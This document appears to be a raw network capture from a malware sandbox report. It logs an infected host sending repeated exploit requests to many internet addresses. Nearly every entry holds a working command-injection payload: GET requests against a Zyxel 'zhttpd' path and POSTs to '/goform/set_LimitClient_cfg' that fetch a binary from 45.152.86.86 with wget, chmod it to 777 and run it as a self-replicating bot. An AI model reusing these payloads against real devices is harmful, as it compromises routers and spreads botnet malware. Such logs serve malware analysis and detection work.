
                                        Session IDSource IPSource PortDestination IPDestination Port
                                        781192.168.2.2346402199.128.157.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188954115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        782192.168.2.235533489.53.250.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189018965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        783192.168.2.235055247.8.2.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189054012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        784192.168.2.2346208223.223.21.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189100027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        785192.168.2.2356686210.166.186.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189147949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        786192.168.2.2359020164.25.72.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189198971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        787192.168.2.2339638206.98.229.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189249992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        788192.168.2.2351774122.132.61.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189296007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        789192.168.2.2357916100.21.235.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189363003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        790192.168.2.2356728123.89.208.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189403057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        791192.168.2.2346798147.89.80.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189481974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        792192.168.2.2351882145.140.163.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189539909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        793192.168.2.236041823.66.51.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189578056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        794192.168.2.2334194119.236.192.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189615011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        795192.168.2.2350850219.101.76.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189682961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        796192.168.2.2349126138.77.232.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.189738035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        797192.168.2.2352982101.139.60.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195075035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        798192.168.2.2337346165.233.28.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195117950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        799192.168.2.2359760150.39.37.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195152044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        800192.168.2.2346992137.64.253.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195193052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        801192.168.2.2342144112.76.171.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195230961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        802192.168.2.234982285.97.122.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195282936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        803192.168.2.236002220.78.238.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195350885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        804192.168.2.2337786170.146.98.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195405960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        805192.168.2.234534479.135.20.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195445061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        806192.168.2.233834081.228.193.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195476055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        807192.168.2.233334612.100.163.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:24.195508957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        808192.168.2.2351686108.78.207.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:25.199605942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        809192.168.2.2359608128.55.44.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:25.199647903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        810192.168.2.2360614140.57.8.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:25.199719906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        811192.168.2.2334718220.194.179.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:25.199892998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        812192.168.2.234621845.60.28.2218080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:26.003179073 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        813192.168.2.234736223.94.116.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:26.204413891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        814192.168.2.2337634207.165.126.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:26.204490900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        815192.168.2.2346322201.155.127.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:26.204689980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        816192.168.2.235851273.15.244.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:26.204776049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        817192.168.2.2339328123.81.197.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:27.210109949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        818192.168.2.2343506113.216.170.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:27.210185051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        819192.168.2.234119073.77.143.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:27.210247993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        820192.168.2.2335922145.122.63.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:27.210319996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        821192.168.2.2344262218.40.107.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:28.212816954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        822192.168.2.2344896184.199.180.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:28.212867975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        823192.168.2.2360932108.5.138.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.216948032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        824192.168.2.234071059.58.148.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.216995955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        825192.168.2.2351204191.173.150.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217036009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        826192.168.2.2345328164.241.202.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217057943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        827192.168.2.2342646114.83.181.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217092991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        828192.168.2.234761887.146.223.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217127085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        829192.168.2.2358678174.211.205.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217222929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        830192.168.2.2333738153.3.54.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217288017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        831192.168.2.2352830204.67.100.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217333078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        832192.168.2.234251842.250.193.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217354059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        833192.168.2.2347944186.158.110.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217391968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        834192.168.2.235251271.210.182.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217430115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        835192.168.2.2333200164.48.52.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217854977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        836192.168.2.2337598176.192.77.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217916012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        837192.168.2.234955823.218.183.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.217945099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        838192.168.2.23363765.217.101.828080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:29.624481916 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:32.791266918 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:38.934330940 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:50.964723110 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:16.305089951 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
